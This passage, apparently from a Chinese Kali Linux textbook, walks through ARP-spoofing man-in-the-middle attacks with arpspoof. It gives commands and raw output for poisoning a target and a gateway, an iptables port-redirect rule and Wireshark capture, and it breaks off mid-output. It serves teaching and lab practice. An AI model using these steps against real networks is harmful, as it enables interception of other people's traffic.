Kali-linux Arpspoof工具
Arpspoof是一個非常好的ARP欺騙的源代碼程序。它的運行不會影響整個網絡的通信,該工具通過替換傳輸中的數據從而達到對目標的欺騙。本節將介紹Arpspoof工具的 使用。
9.8.1 URL流量操縱攻擊
URL流量操作非常類似於中間人攻擊,通過目標主機將路由流量注入到因特網。該過程將通過ARP注入實現攻擊。本小節將介紹使用Arpspoof工具實現URL流量操縱攻擊。使用Arpspoof工具實現URL流量操作攻擊。具體操作步驟如下所示:
(1)開啟路由轉發功能。執行命令如下所示:
root@kali:~# echo 1 >> /proc/sys/net/ipv4/ip_forward
執行以上命令后,沒有任何信息輸出。
(2)啟動Arpspoof注入攻擊目標系統。攻擊的方法是攻擊者(192.168.6.102)發送ARP數據包,以欺騙網關(192.168.6.1)和目標系統(192.168.6.101)。下面首先欺騙目標系統,執行命令如下所示:
root@kali:~# arpspoof -i eth0 -t 192.168.6.101 192.168.6.1 50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d 50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d 50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d 50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d 50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d 50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d 50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d
輸出的信息顯示了攻擊者向目標主機192.168.6.102發送的數據包。其中50:e5:49:eb:46:8d表示攻擊者的MAC地址;19:21:3f:c3:e5表示192.168.6.101的MAC地址。當以上過程攻擊成功后,目標主機192.168.6.101給網關192.168.6.1發送數據時,都將發送到攻擊者192.168.6.102上。
(3)使用Arpspoof注入攻擊網關。執行命令如下所示:
root@kali:~# arpspoof -i eth0 -t 192.168.6.1 192.168.6.101 50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d 50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d 50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d 50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d 50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d 50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d
以上輸出信息顯示了攻擊者向網關192.168.6.1發送的數據包。當該攻擊成功后,網關192.168.6.1發給目標系統192.168.6.101上的信息發送到攻擊者主機192.168.6.102上。
(4)以上步驟都執行成功后,攻擊者就相當於控制了網關與目標主機傳輸的數據。攻擊者可以通過收到的數據,查看到目標系統上重要的信息。
為了驗證以上的信息,下面舉一個簡單的例子。
【實例9-7】通過使用Wireshark抓包驗證Arpspoof工具的攻擊。具體操作步驟如下所示。
(1)啟動Wireshark工具。在Kali Linux桌面依次選擇“應用程序”|Kali Linux|Top 10 Security Tools|wireshark命令,將顯示如圖9.49所示的界面。
圖9.49 Wireshark啟動界面
(2)在該界面Start下面,選擇要捕獲的接口。這里選擇eth0,然后單擊Start按鈕,將顯示如圖9.50所示的界面。
圖9.50 抓包界面
(3)該界面可以對Wireshark進行相關設置及啟動、停止和刷新數據包。
(4)在目標系統192.168.6.101上ping網關192.168.6.1。執行命令如下所示:
C:\Users\Administrator>ping 192.168.6.1
以上命令執行完后,到Kali下查看Wireshark抓取的數據包,如圖9.51所示。
圖9.51 捕獲的數據包
(5)該界面顯示了192.168.6.101與192.168.6.1之間數據傳輸的過程。其中傳輸整個過程的編號為28-33,28-30是一個請求數據包過程,31-33是目標響應數據包過程。下面詳細分析捕獲的數據包。
- 28:表示192.168.6.101(源)向192.168.6.1(目標)發送ping請求。
- 29:表示192.168.6.102將192.168.6.101的數據包進行轉發。
- 30:表示192.168.6.102將轉發后的數據包,再向192.168.6.1發送請求。
- 31:表示目標主機192.168.6.1響應192.168.6.101的請求。
- 32:表示該響應被發送到192.168.6.102上,此時該主機轉發到192.168.6.1。
- 33:目標主機192.168.6.1將轉發的數據發送給192.168.6.101上。
9.8.2 端口重定向攻擊
端口重定向又叫端口轉發或端口映射。端口重定向接收到一個端口數據包的過程(如80端口),並且重定向它的流量到不同的端口(如8080)。實現這類型攻擊的好處就是可以無止境的,因為可以隨着它重定向安全的端口到未加密端口,重定向流量到指定設備的一個特定端口上。本小節將介紹使用Arpspoof實現端口重定向攻擊。使用Arpspoof實現端口重定向攻擊。具體操作步驟如下所示。
(1)開啟路由轉發攻擊。執行命令如下所示:
root@kali:~# echo 1 >> /proc/sys/net/ipv4/ip_forward
(2)啟動Arpspoof工具注入流量到默認網絡。例如,本例中的默認網關地址為192.168.6.1。執行命令如下所示:
root@kali:~# arpspoof -i eth0 192.168.6.1
在Kali Linux上執行以上命令后,沒有任何輸出信息。這是Kali 1.0.6上的一個bug,因為在該系統中dsniff軟件包的版本是dsniff-2.4b1+debian-22。執行arpspoof命令不指定目標系統時,只有在dsniff軟件包為dsniff-2.4b1+debian-21.1上才可正常運行。
(3)添加一條端口重定向的防火牆規則。執行命令如下所示:
root@kali:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
執行以上命令后,沒有任何輸出。
以上設置成功后,當用戶向網關192.168.6.1的80端口發送請求時,將會被轉發為8080端口發送到攻擊者主機上。
9.8.3 捕獲並監視無線網絡數據
使用中間人攻擊的方法,可以使Kali Linux操作系統處在目標主機和路由器之間。這樣,用戶就可以捕獲來自目標主機的所有數據。本小節將介紹通過使用Arpspoof工具實施中間人攻擊,進而捕獲並監視無線網絡數據。
(1)開啟路由器轉發功能。執行命令如下所示:
root@Kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward
(2)使用Arpspoof命令攻擊主機。執行命令如下所示:
root@kali:~# arpspoof -i eth0 -t 192.168.6.106 192.168.6.1 0:c:29:7a:59:75 0:c:29:fc:a9:25 0806 42: arp reply 192.168.6.1 is-at 0:c:29:7a:59:75 0:c:29:7a:59:75 0:c:29:fc:a9:25 0806 42: arp reply 192.168.6.1 is-at 0:c:29:7a:59:75 0:c:29:7a:59:75 0:c:29:fc:a9:25 0806 42: arp reply 192.168.6.1 is-at 0:c:29:7a:59:75 0:c:29:7a:59:75 0:c:29:fc:a9:25 0806 42: arp reply 192.168.6.1 is-at 0:c:29:7a:59:75 0:c:29:7a:59:75 0:c:29:fc:a9:25 0806 42: arp reply 192.168.6.1 is-at 0:c:29:7a:59:75 0:c:29:7a:59:75 0:c:29:fc:a9:25 0806 42: arp reply 192.168.6.1 is-at 0:c:29:7a:59:75 0:c:29:7a:59:75 0:c:29:fc:a9:25 0806 42: arp reply 192.168.6.1 is-at 0:c:29:7a:59:75 0:c:29:7a:59:75 0:c:29:fc:a9:25 0806 42: arp reply 192.168.6.1 is-at 0:c:29:7a:59:75 0:c:29:7a:59:75 0:c:29:fc:a9:25 0806 42: arp